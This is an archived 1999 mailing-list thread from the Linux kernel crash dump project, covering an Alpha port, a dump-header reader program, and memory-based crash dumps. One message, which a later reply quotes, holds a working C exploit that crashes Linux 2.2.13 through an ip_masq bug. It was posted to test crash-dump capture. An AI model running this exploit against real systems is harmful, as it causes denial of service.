From owner-lkcd@oss.sgi.com Wed Dec 1 10:13:38 1999 Received: by oss.sgi.com id ; Wed, 1 Dec 1999 10:13:29 -0800 Received: from mailext03.compaq.com ([207.18.199.41]:51876 "HELO mailext03.compaq.com") by oss.sgi.com with SMTP id ; Wed, 1 Dec 1999 10:13:06 -0800 Received: by mailext03.compaq.com (Postfix, from userid 12345) id EC8B3152157; Wed, 1 Dec 1999 12:19:58 -0600 (CST) Received: from mailint02.im.hou.compaq.com (mailint02.compaq.com [207.18.199.35]) by mailext03.compaq.com (Postfix) with ESMTP id E0529148506 for ; Wed, 1 Dec 1999 12:19:58 -0600 (CST) Received: by mailint02.im.hou.compaq.com (Postfix, from userid 12345) id 626EFBC4C2; Wed, 1 Dec 1999 12:19:52 -0600 (CST) Received: from cxo3ns.cxo.dec.com (cxo3ns.cxo.dec.com [16.63.0.10]) by mailint02.im.hou.compaq.com (Postfix) with SMTP id E7939B2A49 for ; Wed, 1 Dec 1999 12:19:51 -0600 (CST) Received: from brownfur.cxo.dec.com by cxo3ns.cxo.dec.com; (5.65v4.0/1.1.8.2/11Apr96-1001AM) id AA23635; Wed, 1 Dec 1999 11:19:57 -0700 Received: from dhcp192-89.cxo.dec.com by brownfur.cxo.dec.com (5.65v4.0/1.1.10.5/17Feb98-0753AM) id AA24805; Wed, 1 Dec 1999 11:19:57 -0700 Content-Length: 899 Message-Id: X-Mailer: XFMail 1.4.2 on Linux X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit Mime-Version: 1.0 Date: Wed, 01 Dec 1999 11:20:48 -0700 (MST) Reply-To: Brian Hall From: Brian Hall To: lkcd@oss.sgi.com Subject: Volunteer to work with Alpha port of lkcd Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing I would like to work on and/or help with the port of the lkcd patch to the Alpha platform. I have access to several different models with an Alpha processor. Currently I have two 1200s and a ES40 running RedHat 6.0 Alpha, with various versions of the 2.2 kernel. All have their swap on SCSI drives and are available for lkcd testing. Advice on how to proceed would be helpful. Looks like some functions need to be made safe for 64 bits first, then new Alpha-specific functions need to be stubbed out in new files in the Alpha arch tree. I'm a little worried about the snippet of i386 ASM code to save the CPU registers. Hopefully I can use a PALcode system call to do that (and similar things) on the Alpha. Anyone on this list familiar with the Alpha platform, from the point of view of the Linux kernel ? (I know, but I thought I'd ask!) -- Brian Hall Linux Consultant From owner-lkcd@oss.sgi.com Wed Dec 1 10:40:19 1999 Received: by oss.sgi.com id ; Wed, 1 Dec 1999 10:40:09 -0800 Received: from pneumatic-tube.sgi.com ([204.94.214.22]:59439 "EHLO pneumatic-tube.sgi.com") by oss.sgi.com with ESMTP id ; Wed, 1 Dec 1999 10:39:47 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via ESMTP id KAA08447 for ; Wed, 1 Dec 1999 10:48:10 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id KAA82641; Wed, 1 Dec 1999 10:45:21 -0800 (PST) Date: Wed, 1 Dec 1999 10:45:21 -0800 (PST) From: Matt Robinson Reply-To: Matt Robinson To: Brian Hall cc: lkcd@oss.sgi.com Subject: Re: Volunteer to work with Alpha port of lkcd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing On Wed, 1 Dec 1999, Brian Hall wrote: ] I would like to work on and/or help with the port of the lkcd patch ] to the Alpha platform. I have access to several different models with ] an Alpha processor. Currently I have two 1200s and a ES40 running ] RedHat 6.0 Alpha, with various versions of the 2.2 kernel. All have ] their swap on SCSI drives and are available for lkcd testing. Awesome, we're willing to help where we can. ] Advice on how to proceed would be helpful. Looks like some functions ] need to be made safe for 64 bits first, then new Alpha-specific ] functions need to be stubbed out in new files in the Alpha arch tree. ] I'm a little worried about the snippet of i386 ASM code to save the ] CPU registers. Hopefully I can use a PALcode system call to do that ] (and similar things) on the Alpha. The first thing to do is to take the kernel code in arch/i386/kernel/vmdump.c and copy it to arch/alpha/kernel, modify the makefile, and then modify the calls for saving the pt_regs. The code for saving the registers is mostly correct, except for: if (regs) { memcpy((void *)&(dump_header.dh_regs), (const void *)regs, sizeof(struct pt_regs)); > if (!user_mode(regs)) { > dump_header.dh_regs.esp = (unsigned long) (regs + 1); > } } Those lines aren't necessarily needed -- they are I386 specific. We have to adjust the esp based on the processor mode. Also, the code for: /* save the dump specific esp/eip */ __asm__ __volatile__(" pushl %%eax\n movl %%esp, %%eax\n movl %%eax, %0\n popl %%eax\n" : "=g" (dump_header.dh_esp) ); __asm__ __volatile__("pushl %eax\n"); __dump_save_panic_regs(); __asm__ __volatile__("popl %eax\n"); All of this is set up just to save the stack pointer and program counter for this box, as the pt_regs on I386 boxes don't necessarily point to the right location. We want to be able to walk back from the exception where that is possible. In looking at the Alpha stuff, I think you can start by saving the PC and RA values (not sure which $XX they represent), and also put a hook into die_if_kernel() in traps.c. I'd also suggest modifying a system call to test the panic() routine out. Once you get that going, see if the memory is actually being written out to the swap device as expected. If you want, you can change '/sbin/vmdump save' to run a special application to print out the dump header: #include #include #define CONFIG_VMDUMP #include #include dump_header_t dump_header; int main(int argc, char **argv) { FILE *fp; if (argc != 2) { fprintf(stderr, "Usage: %s \n", argv[0]); return (1); } if ((fp = fopen(argv[1], "r")) == (FILE *)NULL) { perror("fopen"); return (1); } fseek(fp, 4096, SEEK_SET); if (fread((char *)&dump_header, sizeof(dump_header_t), 1, fp) < 0) { perror("fread"); return (1); } fclose(fp); printf("Dump Header (version %d):\n", dump_header.dh_version); printf("Magic number: 0x%llx\n", dump_header.dh_magic_number); printf("PAGE_SIZE = %d\n", dump_header.dh_page_size); printf("Dump header size: %d\n", dump_header.dh_header_size); printf("Physical memory:\n"); printf("\tStart: 0x%x\n", dump_header.dh_memory_start); printf("\t End: 0x%x\n", dump_header.dh_memory_end); printf("\t Size: %d\n", dump_header.dh_memory_size); printf("Number of pages in dump: %d\n", dump_header.dh_num_pages); printf("Time of dump: %s\n", ctime(&(dump_header.dh_time.tv_sec))); return (0); } If you run this against /dev/vmdump, it should print out the dump header (it is always after the swap header, at PAGE_SIZE, or 4096 bytes, on our system). Let me know if this gets you started and if we can offer any other advice. Thanks! --Matt ] Anyone on this list familiar with the Alpha platform, from the point ] of view of the Linux kernel ? (I know, but I thought I'd ask!) ] ] -- ] Brian Hall ] Linux Consultant From owner-lkcd@oss.sgi.com Mon Dec 6 11:05:12 1999 Received: by oss.sgi.com id ; Mon, 6 Dec 1999 11:04:53 -0800 Received: from mailext04.compaq.com ([207.18.199.42]:21944 "HELO mailext04.compaq.com") by oss.sgi.com with SMTP id ; Mon, 6 Dec 1999 11:04:30 -0800 Received: by mailext04.compaq.com (Postfix, from userid 12345) id 6BE19104CFC; Mon, 6 Dec 1999 13:11:47 -0600 (CST) Received: from mailint02.im.hou.compaq.com (mailint02.compaq.com [207.18.199.35]) by mailext04.compaq.com (Postfix) with ESMTP id 680F9FB101 for ; Mon, 6 Dec 1999 13:11:47 -0600 (CST) Received: by mailint02.im.hou.compaq.com (Postfix, from userid 12345) id A7488BC4D4; Mon, 6 Dec 1999 13:11:40 -0600 (CST) Received: from cxo3ns.cxo.dec.com (cxo3ns.cxo.dec.com [16.63.0.10]) by mailint02.im.hou.compaq.com (Postfix) with SMTP id 304DEB2A44 for ; Mon, 6 Dec 1999 13:11:40 -0600 (CST) Received: from brownfur.cxo.dec.com by cxo3ns.cxo.dec.com; (5.65v4.0/1.1.8.2/11Apr96-1001AM) id AA08705; Mon, 6 Dec 1999 12:11:46 -0700 Received: from dhcp192-89.cxo.dec.com by brownfur.cxo.dec.com (5.65v4.0/1.1.10.5/17Feb98-0753AM) id AA06225; Mon, 6 Dec 1999 12:11:40 -0700 Content-Length: 1802 Message-Id: X-Mailer: XFMail 1.4.2 on Linux X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit Mime-Version: 1.0 Date: Tue, 07 Dec 1999 16:36:34 -0700 (MST) Reply-To: Brian Hall From: Brian Hall To: lkcd@oss.sgi.com Subject: lkcd doesn't make a dump for this case Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Today there was a post on the kernel list of a snippet of C code to crash to 2.2.13 kernel via an ip_masq exploit. After modifying this to compile (header names were slightly different for some reason), I ran it to test lkcd. The system crashed so fast I could barely see what went on. Looked like several oopses scrolled by, then the dreaded "killing interrupt handler" message. No crash dump was generated. I have successfully created crash dumps on this system via the tests described in the FAQ. My question is, will or can this be fixed in a future version of lkcd? I don't mean specifically relative to this crash case, but in the general "killing interrupt handler" case. Mission Critical Linux claimed they were going to fix this same type of problem in a future version of their crash patch. As of now they are about three weeks overdue on that. The code: /* crash 2.2.13 kernel exploiting a bug in ip_masq_user.c (c)djsf */ #include #include #include #include #include /* #include #include */ #include #include #include #include #include int main() { int sock; struct ip_masq_ctl mctl; memset (&mctl, 0, sizeof (mctl)); mctl.m_target = IP_MASQ_TARGET_USER; mctl.m_cmd = IP_MASQ_CMD_DEL; mctl.u.user.protocol = IPPROTO_UDP; if ((sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) { perror ("socket"); exit (1); } if (setsockopt (sock, IPPROTO_IP, IP_FW_MASQ_CTL, &mctl, sizeof (mctl))) perror ("kab00m failed :) "); exit (0); } -- Brian Hall Linux Consultant From owner-lkcd@oss.sgi.com Mon Dec 6 11:20:15 1999 Received: by oss.sgi.com id ; Mon, 6 Dec 1999 11:20:05 -0800 Received: from sgi.SGI.COM ([192.48.153.1]:70 "EHLO sgi.com") by oss.sgi.com with ESMTP id ; Mon, 6 Dec 1999 11:19:37 -0800 Received: from awesome.engr.sgi.com ([150.166.49.119]) by sgi.com (980327.SGI.8.8.8-aspam/980304.SGI-aspam: SGI does not authorize the use of its proprietary systems or networks for unsolicited or bulk email from the Internet.) via ESMTP id LAA02894 for ; Mon, 6 Dec 1999 11:26:51 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id LAA94292; Mon, 6 Dec 1999 11:25:33 -0800 (PST) Date: Mon, 6 Dec 1999 11:25:32 -0800 (PST) From: Matt Robinson Reply-To: Matt Robinson To: Brian Hall cc: lkcd@oss.sgi.com Subject: Re: lkcd doesn't make a dump for this case In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Hi, Brian. I'll run a few tests on this today. Just an FYI, the reason why ours and MCL's code doesn't work correctly is because you're panicing in an interrupt handler, which means you're calling down() twice, which inevitably breaks the crash dump process. I have a set of code which avoids this problem, but I'm not sure how to integrate it into the kernel, since it is SCSI specific (again). The real point is, if you try to use I/O interrupts to disk when you're already locking out interrupts, you're not going to be able to dump data to disk. It's a problem we are working on. I'll try out your code today and try to have feedback for you if not today, then tomorrow. Thanks! --Matt On Tue, 7 Dec 1999, Brian Hall wrote: |>Today there was a post on the kernel list of a snippet of C code to crash to |>2.2.13 kernel via an ip_masq exploit. After modifying this to compile (header |>names were slightly different for some reason), I ran it to test lkcd. The |>system crashed so fast I could barely see what went on. Looked like several |>oopses scrolled by, then the dreaded "killing interrupt handler" message. No |>crash dump was generated. I have successfully created crash dumps on this |>system via the tests described in the FAQ. |> |>My question is, will or can this be fixed in a future version of lkcd? I don't |>mean specifically relative to this crash case, but in the general "killing |>interrupt handler" case. Mission Critical Linux claimed they were going to fix |>this same type of problem in a future version of their crash patch. As of now |>they are about three weeks overdue on that. |> |>The code: |> |>/* crash 2.2.13 kernel exploiting a bug in ip_masq_user.c (c)djsf */ |> |>#include |>#include |>#include |>#include |>#include |>/* |>#include |>#include |>*/ |>#include |>#include |> |>#include |>#include |>#include |> |>int main() |>{ |> int sock; |> struct ip_masq_ctl mctl; |> |> memset (&mctl, 0, sizeof (mctl)); |> mctl.m_target = IP_MASQ_TARGET_USER; mctl.m_cmd = IP_MASQ_CMD_DEL; |> mctl.u.user.protocol = IPPROTO_UDP; |> if ((sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) { |> perror ("socket"); exit (1); |> } |> if (setsockopt (sock, IPPROTO_IP, IP_FW_MASQ_CTL, &mctl, sizeof (mctl))) |> perror ("kab00m failed :) "); |> exit (0); |>} |> |>-- |>Brian Hall |>Linux Consultant From owner-lkcd@oss.sgi.com Mon Dec 6 11:41:25 1999 Received: by oss.sgi.com id ; Mon, 6 Dec 1999 11:41:15 -0800 Received: from mail.missioncriticallinux.com ([63.211.176.148]:44039 "EHLO mail.mclinux.com") by oss.sgi.com with ESMTP id ; Mon, 6 Dec 1999 11:41:06 -0800 Received: from mclinux.com (IDENT:winchell@winchell.mclinux.com [192.168.1.103]) by mail.mclinux.com (8.9.3/8.9.3) with ESMTP id OAA03699; Mon, 6 Dec 1999 14:47:22 -0500 Message-ID: <384C2200.D98A808F@mclinux.com> Date: Mon, 06 Dec 1999 14:52:16 -0600 From: David Winchell Organization: Mission Critical Linux X-Mailer: Mozilla 4.7 [en] (X11; U; Linux 2.2.5-15smp i686) X-Accept-Language: en MIME-Version: 1.0 To: Brian Hall CC: lkcd@oss.sgi.com, winchell@mclinux.com Subject: Re: lkcd doesn't make a dump for this case References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Brian Hall wrote: > Mission Critical Linux claimed they were going to fix > this same type of problem in a future version of their crash patch. As of now > they are about three weeks overdue on that. This is true, we are overdue. Sorry about the delay. Getting Intel BIOS's to not clear memory on reboot has been a challenge. We've had success on some manufacturer's BIOS and are working on the others. In parallel with the Intel work, we've started on the alpha. This should be easy for the core saving part as we know that it doesn't clear memory with proper setting of console variables. However, we have quite a bit of work to do on the crash analysis tool for alpha. Once we can fully support an architecture, the code will be made available. Meanwhile, we will run the sample program you have on an Intel box that has the "good" BIOS and see what we can come up with. Regards, Dave From owner-lkcd@oss.sgi.com Tue Dec 7 15:53:35 1999 Received: by oss.sgi.com id ; Tue, 7 Dec 1999 15:53:25 -0800 Received: from lowell.missioncriticallinux.com ([63.211.176.149]:3124 "EHLO moyer.mclinux.com") by oss.sgi.com with ESMTP id ; Tue, 7 Dec 1999 15:53:05 -0800 Received: (from moyer@localhost) by moyer.mclinux.com (8.9.3/8.9.3) id SAA13883; Tue, 7 Dec 1999 18:59:59 -0500 X-Authentication-Warning: moyer.mclinux.com: moyer set sender to moyer@mclinux.com using -f From: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14413.40831.220835.54194@moyer.mclinux.com> Date: Tue, 7 Dec 1999 18:59:59 -0500 (EST) To: Brian Hall Cc: lkcd@oss.sgi.com Subject: lkcd doesn't make a dump for this case In-Reply-To: References: X-Mailer: VM 6.75 under Emacs 20.3.1 Reply-To: moyer@missioncriticallinux.com Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing ==> Regarding lkcd doesn't make a dump for this case; Brian Hall adds: [snip] brianw.hall> case. Mission Critical Linux claimed they were going to fix brianw.hall> this same type of problem in a future version of their crash brianw.hall> patch. As of now they are about three weeks overdue on that. Well, we were able to generate a dump for your test case. Unfortunately, the stack trace was none too interesting. The killing interrupt handler part of your oops means that either the local_bh_count is non-zero, the local_irq_count is non-zero, or both. With our dump, we were at least able to determine which of these was true: crash> p local_bh_count local_bh_count[1] = { 00000001 }; crash> p local_irq_count local_irq_count[1] = { 00000000 }; As you know from the posting to the kernel list, the function start_bh_atomic was called, without the corresponding end_bh_atomic. This increments (in the UP kernel) the local_irq_count, causing our problem. The next time we enter schedule, this count is non-zero, so the check for in_interrupt() returns 1, and we get our scheduling in interrupt problem. I hope this is useful to you in some way. As Dave mentioned, once we come up with a method for preserving memory on reboots that works with all BIOS's, we will make the code available. Regards, Jeff Moyer Mission Critical Linux http://www.missioncriticallinux.com From owner-lkcd@oss.sgi.com Mon Dec 13 00:19:34 1999 Received: by oss.sgi.com id ; Mon, 13 Dec 1999 00:19:25 -0800 Received: from fes-qout.whowhere.com ([209.1.236.7]:20133 "HELO mailcity.com") by oss.sgi.com with SMTP id ; Mon, 13 Dec 1999 00:19:00 -0800 Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Mon Dec 13 00:17:39 1999 To: lkcd@oss.sgi.com Date: Mon, 13 Dec 1999 00:17:39 -0800 From: "Ashish Arora" Message-ID: Mime-Version: 1.0 X-Sent-Mail: off Reply-To: ashisharora@mailcity.com X-Mailer: MailCity Service Subject: info for LKCD X-Sender-Ip: 192.35.232.115 Organization: MailCity (http://www.mailcity.lycos.com:80) Content-Type: text/plain; charset=us-ascii Content-Language: en Content-Length: 277 Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Can any one guide me to what is the system dump and what is the work being done in that area in Linux. I would also like to know about the various crash facilities that are being provided in Linux. LYCOShop is now open. On your mark, get set, SHOP!!! http://shop.lycos.com/ From owner-lkcd@oss.sgi.com Mon Dec 13 00:28:44 1999 Received: by oss.sgi.com id ; Mon, 13 Dec 1999 00:28:35 -0800 Received: from sgi.SGI.COM ([192.48.153.1]:4972 "EHLO sgi.com") by oss.sgi.com with ESMTP id ; Mon, 13 Dec 1999 00:28:16 -0800 Received: from awesome.engr.sgi.com ([150.166.49.119]) by sgi.com (980327.SGI.8.8.8-aspam/980304.SGI-aspam: SGI does not authorize the use of its proprietary systems or networks for unsolicited or bulk email from the Internet.) via ESMTP id AAA00171 for ; Mon, 13 Dec 1999 00:27:04 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id AAA35981; Mon, 13 Dec 1999 00:25:48 -0800 (PST) Date: Mon, 13 Dec 1999 00:25:47 -0800 (PST) From: Matt Robinson To: Ashish Arora cc: lkcd@oss.sgi.com Subject: Re: info for LKCD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing There are a few development fronts in the area of system dumps. The LKCD project is one such effort, although there is an additional effort from the folks at Mission Critical Linux, who are on this list and can provide information about their work. Beyond that, there are a few things that provide information about system crashes, but that doesn't really address your need for system dumps. If you've got questions about LKCD, check out: http://oss.sgi.com/projects/lkcd/faq.html We consider it the foundation for system dumps in Linux, for both now and in the future. Your mileage may vary. :) You can also download the code and see our implementation mechanism if you're curious about the code. It's fairly straightforward. I'm in the process of writing a paper for our talk at LinuxExpo on LKCD, and when it's finished and thoroughly reviewed, I'll send it out. For those of you who'd like to attend the talk, Tom and I will be in New York in February at LinuxExpo to discuss LKCD (along with other efforts in the community) and how we can make kernel dumps a supported reality for commercial Linux users. --Matt P.S. To everyone out there, I'll send out a new News bulletin as to where we're at with things here, including what we're working on, what we need from the community, etc. Thanks for all your support. On Mon, 13 Dec 1999, Ashish Arora wrote: |> Can any one guide me to what is the system dump and what is the work |> being done in that area in Linux. I would also like to know about the |> various crash facilities that are being provided in Linux. From owner-lkcd@oss.sgi.com Mon Dec 13 01:58:01 1999 Received: by oss.sgi.com id ; Mon, 13 Dec 1999 01:57:51 -0800 Received: from fes-qout.whowhere.com ([209.1.236.7]:29156 "HELO mailcity.com") by oss.sgi.com with SMTP id ; Mon, 13 Dec 1999 01:57:47 -0800 Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Mon Dec 13 01:55:31 1999 To: "Matt Robinson" Date: Mon, 13 Dec 1999 01:55:31 -0800 From: "Ashish Arora" Message-ID: Mime-Version: 1.0 Cc: lkcd@oss.sgi.com X-Sent-Mail: on Reply-To: ashisharora@mailcity.com X-Expiredinmiddle: true X-Mailer: MailCity Service Subject: Re: info for LKCD X-Sender-Ip: 192.35.232.115 Organization: MailCity (http://www.mailcity.lycos.com:80) Content-Type: text/plain; charset=us-ascii Content-Language: en Content-Length: 2288 Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing I would like to know where i can get the source code for the lkcd project. I would also like to ask the eople working on the Mission Critical Linux to tell me about the aspects of Mission Critical Computing they are dealing in at present. And what are the facilities that will be provided in that Linux. Matt, can u tell me more about what is really being done in the ares of system Dumps and what is being dealt in system crashes, what is the solution for system crash. - Ashish On Mon, 13 Dec 1999 00:25:47 Matt Robinson wrote: >There are a few development fronts in the area of system dumps. >The LKCD project is one such effort, although there is an additional >effort from the folks at Mission Critical Linux, who are on this list >and can provide information about their work. Beyond that, there are >a few things that provide information about system crashes, but that >doesn't really address your need for system dumps. > >If you've got questions about LKCD, check out: > > http://oss.sgi.com/projects/lkcd/faq.html > >We consider it the foundation for system dumps in Linux, for both >now and in the future. Your mileage may vary. :) > >You can also download the code and see our implementation mechanism >if you're curious about the code. It's fairly straightforward. > >I'm in the process of writing a paper for our talk at LinuxExpo on >LKCD, and when it's finished and thoroughly reviewed, I'll send it >out. For those of you who'd like to attend the talk, Tom and I will >be in New York in February at LinuxExpo to discuss LKCD (along with >other efforts in the community) and how we can make kernel dumps a >supported reality for commercial Linux users. > >--Matt > >P.S. To everyone out there, I'll send out a new News bulletin as to > where we're at with things here, including what we're working on, > what we need from the community, etc. Thanks for all your support. > >On Mon, 13 Dec 1999, Ashish Arora wrote: >|> Can any one guide me to what is the system dump and what is the work >|> being done in that area in Linux. I would also like to know about the >|> various crash facilities that are being provided in Linux. > > LYCOShop is now open. On your mark, get set, SHOP!!! http://shop.lycos.com/ From owner-lkcd@oss.sgi.com Mon Dec 13 08:05:31 1999 Received: by oss.sgi.com id ; Mon, 13 Dec 1999 08:05:22 -0800 Received: from mail.missioncriticallinux.com ([63.211.176.148]:11529 "EHLO mail.mclinux.com") by oss.sgi.com with ESMTP id ; Mon, 13 Dec 1999 08:05:00 -0800 Received: from mclinux.com (IDENT:winchell@winchell.mclinux.com [192.168.1.103]) by mail.mclinux.com (8.9.3/8.9.3) with ESMTP id LAA12474; Mon, 13 Dec 1999 11:03:29 -0500 Message-ID: <38552814.966448BC@mclinux.com> Date: Mon, 13 Dec 1999 11:08:36 -0600 From: David Winchell Organization: Mission Critical Linux X-Mailer: Mozilla 4.7 [en] (X11; U; Linux 2.2.5-15smp i686) X-Accept-Language: en MIME-Version: 1.0 To: ashisharora@mailcity.com CC: lkcd@oss.sgi.com, winchell@mclinux.com Subject: [Fwd: Memory based kernel crash dump] Content-Type: multipart/mixed; boundary="------------DA32CFCCD346A1644011B3F3" Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing This is a multi-part message in MIME format. --------------DA32CFCCD346A1644011B3F3 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Ashish, You can check out our web site at www.mclinux.com for information. Also, I believe there is a press release coming out today that will give some details. On the crash front we have a version 1 available from the web site. The crash saving is not as slick as SGI's but the crash analysis might be better. I am working on a version 2 which is memory based. This may have been discussed on this list and was discussed on the linux-kernel list. A copy of the mail is attached. regards, Dave --------------DA32CFCCD346A1644011B3F3 Content-Type: message/rfc822 Content-Transfer-Encoding: 7bit Content-Disposition: inline Return-Path: Received: from mclinux.com (IDENT:winchell@winchell.mclinux.com [192.168.1.103]) by mail.mclinux.com (8.9.3/8.9.3) with ESMTP id KAA12977; Thu, 11 Nov 1999 10:49:53 -0500 Sender: winchell@missioncriticallinux.com Message-ID: <382AE668.A18EED73@mclinux.com> Date: Thu, 11 Nov 1999 09:53:12 -0600 From: David Winchell Organization: Mission Critical Linux X-Mailer: Mozilla 4.7 [en] (X11; U; Linux 2.2.5-15smp i686) X-Accept-Language: en MIME-Version: 1.0 To: "linux-kernel@vger.rutgers.edu" CC: winchell@mclinux.com Subject: Memory based kernel crash dump Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Hello, I have been working on a kernel crash dump that does not rely on the disk subsystems during the crash. Instead, the crash is saved in memory at crash time and then saved to a file on the subsequent boot. The save at crash time is accomplished by selecting pages that are not [free, user anon, user shared, file page cache] and compressing them into pages that are above a certain address, a certain distance from the end of memory, not locked, and are members of [free, user anon, user shared, file page cache]. A reboot is then requested with the option to preserve memory. Early in the boot process, the non-contiguous pages containing the dump are copied to contiguous pages at the end of memory. Later in the boot process, they are written to a file and freed. On a 96M machine the size of the compressed dump was 4M. Scratch memory is saved at boot time for crash dump use. I use about 2M for this, though smaller amounts can be tuned. This ensures that a dump can be taken even with very low free memory conditions. For example, here is a stack trace of a crash in interrupt context, a case that can be difficult for disk based solutions: crash> bt PID: 286 TASK: c0b3a000 CPU: 0 COMMAND: "in.rlogind" #0 [c0b3be90] crash_save_current_state at c011aed0 (c0b3a000,c08e4190,4000001,c0b3bee8,tulip_interrupt+0x2c) #1 [c0b3bea4] panic+0xac at c011367c (media_cap+0x1446,c08e4190,4000001,9,5a8) #2 [c0b3bee8] tulip_interrupt+0x2c at c01bc820 (9,eth0_dev,c0b3bf44,irq_desc+0x90,9) #3 [c0b3bf08] handle_IRQ_event+0x2d at c010a551 (9,c0b3bf44,c08e4190) #4 [c0b3bf2c] do_8259A_IRQ+0x75 at c010a319 (9,c0b3bf44,c0b3bfbc,ret_from_intr,c0e68280) #5 [c0b3bf3c] do_IRQ+0x23 at c010a653 (c0e68280,0,4,4,c0e68284) #6 [c0b3bfbc] ret_from_intr at c0109634 (4,bfffc9a0,0,bfffc8a0,0) #7 [bfffd224] system_call+0x34 at c0109598 For this test crash I set a flag with a system call which instructed the tulip interrupt handler to call panic(). Now the request for help. Some BIOS (Dell, NEC) clear memory on reboot even when the flags to not test or to preserve are set. Others (HP) do not clear memory. Can someone point me to BIOS developers at Dell or Phoenix or other manufacturers so that I can lobby for a flag that I can pass to the BIOS so that it will preserve the contents of memory? If anyone is interested in trying my code I'd be glad to make it available today or tomorrow. thanks Dave --------------DA32CFCCD346A1644011B3F3-- From owner-lkcd@oss.sgi.com Mon Dec 13 09:50:42 1999 Received: by oss.sgi.com id ; Mon, 13 Dec 1999 09:50:23 -0800 Received: from deliverator.sgi.com ([204.94.214.10]:41484 "EHLO deliverator.sgi.com") by oss.sgi.com with ESMTP id ; Mon, 13 Dec 1999 09:49:59 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by deliverator.sgi.com (980309.SGI.8.8.8-aspam-6.2/980310.SGI-aspam) via ESMTP id JAA21114 for ; Mon, 13 Dec 1999 09:44:34 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id JAA26633; Mon, 13 Dec 1999 09:47:33 -0800 (PST) Date: Mon, 13 Dec 1999 09:47:32 -0800 (PST) From: Matt Robinson Reply-To: Matt Robinson To: Ashish Arora cc: Matt Robinson , lkcd@oss.sgi.com Subject: Re: info for LKCD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Hi, Ashish. You can get most of your answers from the FAQ, but please visit our website: http://oss.sgi.com/projects/lkcd If you have specific questions that the FAQ doesn't answer, we'll do what we can to help. Also, feel free to review the mail archive for this newsgroup, also available via the URL above, to see what has been discussed in the past. --Matt On Mon, 13 Dec 1999, Ashish Arora wrote: |>I would like to know where i can get the source code for the lkcd project. I would also like to ask the eople working on the Mission Critical Linux to tell me about the aspects of Mission Critical Computing they are dealing in at present. And what are the facilities that will be provided in that Linux. |> Matt, can u tell me more about what is really being done in the ares of system Dumps and what is being dealt in system crashes, what is the solution for system crash. |> |>- Ashish |> |> |>On Mon, 13 Dec 1999 00:25:47 Matt Robinson wrote: |>>There are a few development fronts in the area of system dumps. |>>The LKCD project is one such effort, although there is an additional |>>effort from the folks at Mission Critical Linux, who are on this list |>>and can provide information about their work. Beyond that, there are |>>a few things that provide information about system crashes, but that |>>doesn't really address your need for system dumps. |>> |>>If you've got questions about LKCD, check out: |>> |>> http://oss.sgi.com/projects/lkcd/faq.html |>> |>>We consider it the foundation for system dumps in Linux, for both |>>now and in the future. Your mileage may vary. :) |>> |>>You can also download the code and see our implementation mechanism |>>if you're curious about the code. It's fairly straightforward. |>> |>>I'm in the process of writing a paper for our talk at LinuxExpo on |>>LKCD, and when it's finished and thoroughly reviewed, I'll send it |>>out. For those of you who'd like to attend the talk, Tom and I will |>>be in New York in February at LinuxExpo to discuss LKCD (along with |>>other efforts in the community) and how we can make kernel dumps a |>>supported reality for commercial Linux users. |>> |>>--Matt |>> |>>P.S. To everyone out there, I'll send out a new News bulletin as to |>> where we're at with things here, including what we're working on, |>> what we need from the community, etc. Thanks for all your support. |>> |>>On Mon, 13 Dec 1999, Ashish Arora wrote: |>>|> Can any one guide me to what is the system dump and 